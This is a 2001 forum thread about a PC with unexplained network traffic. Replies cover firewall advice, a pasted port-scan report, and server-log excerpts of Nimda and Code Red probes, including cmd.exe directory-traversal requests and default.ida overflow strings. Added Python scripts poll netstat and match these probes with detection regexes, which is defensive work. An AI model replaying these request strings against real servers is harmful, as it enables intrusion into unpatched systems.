Randomly uploading/downloading moderately sized chunks of data

fury

Administrator
Staff member
From time to time (around every 10 or so minutes today) my computer just starts randomly accessing the internet. I can't manage to catch it in time to see any IPs on netstat -n, but the thing definitely just randomly starts receiving around 10-20kb and sending 1-2kb, sometimes 3kb.

I've been hacked. :retard: Thank you, Microsoft Windows!

I can't WAIT to get Windows XP. At least then I can probably protect myself from the millions and millions of security holes that infect my computer.
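The bursts fury describes are short enough to slip past a one-off netstat -n; polling it and recording every remote endpoint the first time it appears is the way to catch them. This is an added example, not code from the thread: a Python poller that diffs successive netstat -n snapshots. The snapshot layout it parses and the constructed documentation-range addresses in the samples are assumptions.

```python
import re
import subprocess
import time

# One `netstat -n` connection row: Windows layout, or Linux layout with its two queue counters.
CONN_RE = re.compile(
    r"^\s*(tcp|udp)\S*\s+(?:\d+\s+\d+\s+)?\S+:\d+\s+(\d+\.\d+\.\d+\.\d+):(\d+)", re.I)

# Constructed snapshots in the Windows `netstat -n` layout; addresses come from the
# documentation ranges and are not real peers. They stand in for live output offline.
SNAP_1 = """\
  Proto  Local Address          Foreign Address        State
  TCP    192.168.0.2:1034       198.51.100.20:5190     ESTABLISHED
"""
SNAP_2 = """\
  Proto  Local Address          Foreign Address        State
  TCP    192.168.0.2:1034       198.51.100.20:5190     ESTABLISHED
  TCP    192.168.0.2:1051       203.0.113.9:80         TIME_WAIT
"""

def parse_netstat(text):
    """Set of (proto, peer_ip, peer_port) for every connection row in one snapshot."""
    peers = set()
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m and m.group(2) != "0.0.0.0":   # 0.0.0.0:0 is a listener, not a peer
            peers.add((m.group(1).upper(), m.group(2), int(m.group(3))))
    return peers

def watch(interval=1.0, snapshots=None):
    """Poll `netstat -n` every `interval` seconds and report each peer the first time it shows
    up. `snapshots` (captured outputs) replaces the live call and makes the loop return the
    list of (clock time, peer) first sightings once the snapshots are exhausted."""
    seen, sightings = set(), []
    source = iter(snapshots) if snapshots is not None else None
    while True:
        if source is None:
            text = subprocess.run(["netstat", "-n"], capture_output=True, text=True).stdout
        else:
            text = next(source, None)
            if text is None:
                return sightings
        current = parse_netstat(text)
        for peer in sorted(current - seen):   # only peers never seen in an earlier poll
            stamp = time.strftime("%H:%M:%S")
            sightings.append((stamp, peer))
            print(f"{stamp}  new peer {peer[0]} {peer[1]}:{peer[2]}")
        seen |= current
        if source is None:
            time.sleep(interval)
```

Run `watch()` with no arguments in a console before the next burst and it prints the remote address and port of each new connection with the time it first appeared.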
 

Gonzo

Infinitesimally Outrageous
Staff member
Do you have Update check or whatever it's called, from MS? Or is IRC/ICQ/AIM/etc. on? There are a thousand possibilities. I run ZA & it does that too. It's usually some benign background app running.
 

fury

Administrator
Staff member
Originally posted by Gonzo
Do you have Update check or whatever it's called, from MS? Or is IRC/ICQ/AIM/etc. on? There are a thousand possibilities. I run ZA & it does that too. It's usually some benign background app running.
Neither IRC nor AIM transfers that much data (I'm sure about IRC, but I don't know about AIM).

I don't run ZA.

I run Genome@Home, Apache, MySQL and Outlook Express aside from AIM and mIRC. Genome@Home is on nonet (meaning I control when it uploads and downloads), Apache hasn't had any accesses from outside IPs since about 20 minutes after I woke up (I sent an IRC script to someone through it), MySQL doesn't send anything over the internet, and I have OE set to check for new mail every half hour.
 

Gonzo

Infinitesimally Outrageous
Staff member
I didn't 'splain ZA properly. It tells me whenever an app accesses the net, if I've allowed it, & whatever IS accessing at the moment. I get about 50-100 random hits a day & they're blocked.
Example:
The firewall has blocked Internet access to your computer (Telnet) from 202.94.67.15 (TCP Port 37449) [TCP Flags: S].

Time: 9/27/01 1:49:56 PM.


It's frequently coming from my own ISP...
And yes, I know you probably knew that.

Check this out & see if you're particularly vulnerable: https://grc.com/x/ne.dll?bh0bkyd2
 

s4

Guest
Windows XP is not your answer. There are a ton of services installed running in the background, and some of them try to connect to the web. I have found Sygate Personal Firewall is more to my liking as a firewall, and it tells you the IP that a program is trying to connect to. It's free and just as good as ZA.

A file called Svchost.exe in XP tries to connect right off the bat when you connect to the web. Turns out it handles many other services on the machine. I don't run the beta of XP any more and went back to using Win ME.
 

fury

Administrator
Staff member
Your Internet port 139 does not appear to exist!
One or more ports on this system are operating in FULL STEALTH MODE! Standard Internet behavior requires port connection attempts to be answered with a success or refusal response. Therefore, only an attempt to connect to a nonexistent computer results in no response of either kind. But YOUR computer has DELIBERATELY CHOSEN NOT TO RESPOND (that's very cool!) which represents advanced computer and port stealthing capabilities. A machine configured in this fashion is well hardened to Internet NetBIOS attack and intrusion.
Unable to connect with NetBIOS to your computer.
All attempts to get any information from your computer have FAILED. (This is very uncommon for a Windows networking-based PC.) Relative to vulnerabilities from Windows networking, this computer appears to be VERY SECURE since it is NOT exposing ANY of its internal NetBIOS networking protocol over the Internet.

21 FTP: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
23 Telnet: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
25 SMTP: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
79 Finger: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
80 HTTP: OPEN! The web is so insecure these days that new security "exploits" are being discovered almost daily. There are many known problems with Microsoft's Personal Web Server (PWS) and its Frontpage Extensions that many people run on their personal machines. So having port 80 "open" as it is here causes intruders to wonder how much information you might be willing to give away. (This is understandably open, as I run an Apache web server on my computer, but I have checked its access logs repeatedly, and no data has been sent to an outside IP since 11:04 AM)
110 POP3: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
113 IDENT: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
135 RPC: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
139 NetBIOS: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
143 IMAP: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
443 HTTPS: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
445 MSFT-DS: Stealth! There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!
 

NEWMAN

Live GEEK Radio
Server Logs

:laugh: I get that on my server all the time; my ISP says that we have all been had. While running some system checks on my logs I got ...

202.45.37.205 - - [28/Sep/2001:02:45:20 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:21 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:23 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:24 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:25 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:27 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:28 -0700] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:29 -0700] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:30 -0700] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:31 -0700] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:33 -0700] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:34 -0700] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:35 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:36 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:37 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:39 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:37 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:39 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:41 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:43 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:46 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:48 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:51 -0700] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:54 -0700] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:53:57 -0700] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:01 -0700] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:04 -0700] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:07 -0700] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:11 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:15 -0700] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193 - - [28/Sep/2001:02:54:18 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.106.16.193

All preying on your IP numbers, trying to get into your systems.
Oh, and then there's Code Red, and Blue, that's running around the net looking for MS IIS servers.

202.103.30.11 - - [28/Sep/2001:01:43:11 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 302 0 0 "-" "-"
61.135.31.142 - - [28/Sep/2001:02:43:32 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 302 0 0 "-" "-"

They're fun too ...

It might be I have no idea what I'm talking about, but hey, just thought that I'd give you all my 2 cents.
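The requests NEWMAN pasted are the two probe shapes that filled IIS and Apache logs that autumn: the cmd.exe/root.exe traversal sequence (Nimda, and the root.exe backdoor copy left by Code Red II) and the default.ida request with a %u-encoded payload (Code Red). As an added example that is not part of the thread, here is a small Python scanner that picks those shapes out of access-log lines in the same layout and groups the hits by source address. The sample lines are constructed from the thread's entries with the long X run shortened, and the signature names are my own.

```python
import re
from collections import defaultdict

# Constructed sample in the thread's log layout (client - - [time] "request" status ...).
# The client IPs are the ones quoted in the thread; the Code Red "XXXX" padding is shortened.
SAMPLE_LOG = """\
202.45.37.205 - - [28/Sep/2001:02:45:20 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.45.37.205 - - [28/Sep/2001:02:45:25 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
202.103.30.11 - - [28/Sep/2001:01:43:11 -0700] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% HTTP/1.0" 302 0 0 "-" "-"
198.51.100.7 - - [28/Sep/2001:03:00:00 -0700] "GET /index.html HTTP/1.0" 200 1234 0 "-" "-"
"""

# Common-log prefix: client ident user [time] "method path protocol" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')

# Signatures written from the request shapes in the thread's excerpt. The status code is
# ignored on purpose: a 404 still tells you who is probing, which is the point here.
SIGNATURES = (
    # Code Red: .ida ISAPI overflow, recognisable by the X padding and %u-encoded payload
    ("code-red-ida-overflow", re.compile(r"/default\.ida\?x+.*%u", re.I)),
    # Nimda / Code Red II: reaching cmd.exe, or the root.exe copy Code Red II leaves behind
    ("iis-cmd-shell-probe", re.compile(r"/(?:cmd|root)\.exe\?", re.I)),
    # ".." followed by an escaped or overlong-UTF-8 separator; the forum rendered the
    # overlong bytes as stray accented characters, hence the non-ASCII alternative
    ("unicode-traversal", re.compile(r"\.\.(?:%5c|%2f|%c0%af|%c1%1c|%c1%9c|[^\x00-\x7f])", re.I)),
)

def parse_line(line):
    """(client_ip, time, path) for one access-log line, or None if it is not in that layout."""
    m = LOG_RE.match(line)
    return (m.group(1), m.group(2), m.group(3)) if m else None

def classify_request(path):
    """Every signature label the request path matches, in SIGNATURES order."""
    return [label for label, rx in SIGNATURES if rx.search(path)]

def summarize(log_text):
    """Per client IP: number of flagged requests, distinct signatures, first and last time."""
    report = defaultdict(lambda: {"hits": 0, "signatures": set(), "first": None, "last": None})
    for ip, when, path in filter(None, map(parse_line, log_text.splitlines())):
        labels = classify_request(path)
        if not labels:
            continue
        entry = report[ip]
        entry["hits"] += 1
        entry["signatures"].update(labels)
        entry["first"] = entry["first"] or when
        entry["last"] = when
    return dict(report)
```

`summarize(open("access.log").read())` gives one entry per probing address with its hit count, the signatures it tripped and the time window, which is enough to tell a worm sweep from a hand-driven attempt.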
 